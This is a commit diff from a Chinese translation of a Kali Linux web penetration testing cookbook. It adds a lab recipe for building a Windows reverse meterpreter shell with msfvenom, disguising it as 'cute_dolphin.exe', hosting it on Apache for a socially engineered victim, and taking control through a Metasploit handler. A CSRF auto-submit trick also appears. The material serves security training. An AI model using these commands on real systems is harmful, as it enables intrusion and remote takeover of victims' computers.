Skip to content
体验新版
项目
组织
正在加载...
登录
切换导航
打开侧边栏
OpenDocCN
kali-linux-web-pentest-cookbook-zh
提交
81832da3
K
kali-linux-web-pentest-cookbook-zh
项目概览
OpenDocCN
/
kali-linux-web-pentest-cookbook-zh
通知
4
Star
4
Fork
0
代码
文件
提交
分支
Tags
贡献者
分支图
Diff
Issue
0
列表
看板
标记
里程碑
合并请求
0
Wiki
0
Wiki
分析
仓库
DevOps
项目成员
Pages
K
kali-linux-web-pentest-cookbook-zh
项目概览
项目概览
详情
发布
仓库
仓库
文件
提交
分支
标签
贡献者
分支图
比较
Issue
0
Issue
0
列表
看板
标记
里程碑
合并请求
0
合并请求
0
Pages
分析
分析
仓库分析
DevOps
Wiki
0
Wiki
成员
成员
收起侧边栏
关闭侧边栏
动态
分支图
创建新Issue
提交
Issue看板
前往新版Gitcode,体验更适合开发者的 AI 搜索 >>
提交
81832da3
编写于
10月 13, 2016
作者:
W
wizardforcel
浏览文件
操作
浏览文件
下载
电子邮件补丁
差异文件
9.3
上级
10d541ca
变更
1
隐藏空白更改
内联
并排
Showing
1 changed file
with
87 addition
and
0 deletion
+87
-0
ch9.md
ch9.md
+87
-0
未找到文件。
ch9.md
浏览文件 @
81832da3
...
...
@@ -226,3 +226,90 @@ action="http://192.168.56.102/bodgeit/login.jsp">
```
要注意,
`body `
中的
`onload`
事件并不调用
`frm1.submit() `
而是
` frm1.submit. click()`
。这是因为当我们使用
`submit`
作为表单元素的名称时,表单中的
`submit()`
函数会被这个元素覆盖掉(这里是提交按钮)。我们并不打算修改按钮名称,因为它是原始站点需要的名称。所以我们使
`submit`
变成一个按钮,而不是隐藏字段,并使用它的
`click`
函数将值提交到原始站点。我们同时将表单中的字段值设置为我们之前用于储存用户数据的变量值。
## 9.3 使用 Metasploit 创建反向 shell 并捕获连接
当我们执行客户端攻击的时候,我们能够欺骗用户来执行程序,并使这些程序连接回控制端。
这个秘籍中,我们会了解如何使用 Metasploit 的 msfvenom 来创建可执行程序(反向 meterpreter shell),它会在执行时连接我们的 Kali 主机,并向我们提供用户计算机的控制。
### 操作步骤
1.
首先,我们要创建我们的 shell。在 Kali 中打开终端并执行下列命令:
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4443 -f exe > cute_dolphin.exe
```
这会创建名为`cute_dolphin.exe`的文件,这是反向 meterpreter shell,反向意味着它会连接回我们,而不是监听我们的连接。
2.
下面,我们需要为我们“可爱的海豚”将要创建的连接建立监听器。在 MSFconsole 的终端中:
```
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.56.1 set lport 4443
set ExitOnSession false
set AutorunScript post/windows/manage/smart_migrate
exploit -j -z
```
就像你看到的那样,LHOST 和 RPORT 是我们用于创建`exe`文件的东西。这是程序将要连接的 IP 地址和 TCP 端口。所以我们需要在这个 Kali 的网络接口和端口上监听。
3.
我们的 Kali 已准备就绪,现在是准备攻击用户的时候了,我们以 root 启动 Apache 服务并运行下列代码:
```
service apache2 start
```
4.
之后,将恶意文件复制到 web 服务器文件夹内。
```
cp cute_dolphin.exe /var/www/html/
```
5.
假设我们使用社会工程并使我们的受害者相信这个文件是需要执行来获得一些好处的东西。在 Windows 客户端虚拟机内,访问
` http://192.168.56.1/cute_dolphin.exe`
。
6.
你会被询问下载还是运行这个文件,出于测试目的,选择
`Run`
(运行),再被询问时,再次选择
`Run`
。
7.
现在,在 Kali MSFCONSOLE 的终端中,你会看到建立好的连接:
![](img/9-3-1.jpg)
8.
我们在后台运行连接处理器(
`-j -z`
选项)。让我们检查我们的活动会话:
```
sessions
```
![](img/9-3-2.jpg)
9.
如果我们打算和会话交互,可以使用
`-i`
选项,带有会话的编号:
```
sessions -i 1
```
0.
我们会看到 meterpreter 的提示符。现在,我们可以请求被入侵系统的信息。
```
sysinfo
```
![](img/9-3-3.jpg)
1.
或者执行系统 shell。
```
shell
```
![](img/9-3-4.jpg)
### 工作原理
Msfvenom 帮助的我们从 Metasploit 大量列表中创建载荷,并且将它们集成到许多语言的源代码中,或者创建脚本和可执行文件。就像我们在这个秘籍所做的那样。我们这里所使用的参数是所使用的载荷(
`windows/ meterpreter/reverse_tcp`
)、连接回来所需的主机和端口(LHOST 和 RPORT),以及输出格式(
`-f exe`
)。将标准输出重定向到文件来将它保存为
` cute_dolphin.exe`
。
Metasploit 的 exploit/multi/handler 是个载荷处理器,这里我们将其用于监听连接。在连接建立之后,它执行了 meterpreter 载荷。
Meterpreter 是增强型的 Metasploit shell。它包含用于嗅探受害者网络的模块,用于将其作为支点来访问本地网络,或者用于执行权限提升和密码提取,以及其它渗透测试中实用的事情。
编辑
预览
Markdown
is supported
0%
请重试
或
添加新附件
.
添加附件
取消
You are about to add
0
people
to the discussion. Proceed with caution.
先完成此消息的编辑!
取消
想要评论请
注册
或
登录